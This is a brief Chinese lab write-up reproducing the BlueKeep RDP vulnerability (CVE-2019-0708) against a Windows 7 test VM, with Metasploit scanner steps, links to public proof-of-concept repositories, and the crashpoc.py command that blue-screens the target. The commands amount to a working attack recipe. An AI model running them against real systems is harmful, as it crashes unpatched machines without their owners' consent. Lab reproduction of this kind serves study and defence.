**CVE-2019-0708漏洞复现**
目标机:192.168.91.147
攻击机:192.168.91.146
危害涉及:
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
准备工作:
目标机为win7,开启远程桌面,关闭防火墙1.开启远程桌面:控制面板-系统与安全-系统-远程设置-选择运行连接远程桌面-添加用户
2.关闭防火墙:控制面板-系统与安全-windows防火墙-关闭(两个都关)
攻击机下载:
https://github.com/zerosum0x0/CVE-2019-0708
https://github.com/n1xbyte/cve-2019-0708
解压压缩包,并将cve_2019_0708_bluekeep.rb
文件放进/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp
目录
打开msf:
为了防止不必要的错误
先搜索一下0708脚本
的确存在
检测模块:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
设置目标:set RHOSTS 192.168.91.147
直接run
:得到:
由 the target is vulnerable直到目标机的确存在此漏洞
在执行脚本前,先安装python的impacket库: pip3 install impacket
python3 /root/CVE-2019-0708-master/crashpoc.py 192.168.91.147 64
由于我没有将python文件放在msf文件下,所以使用的绝对路径:
再去看看win7,已经蓝屏
复现完毕!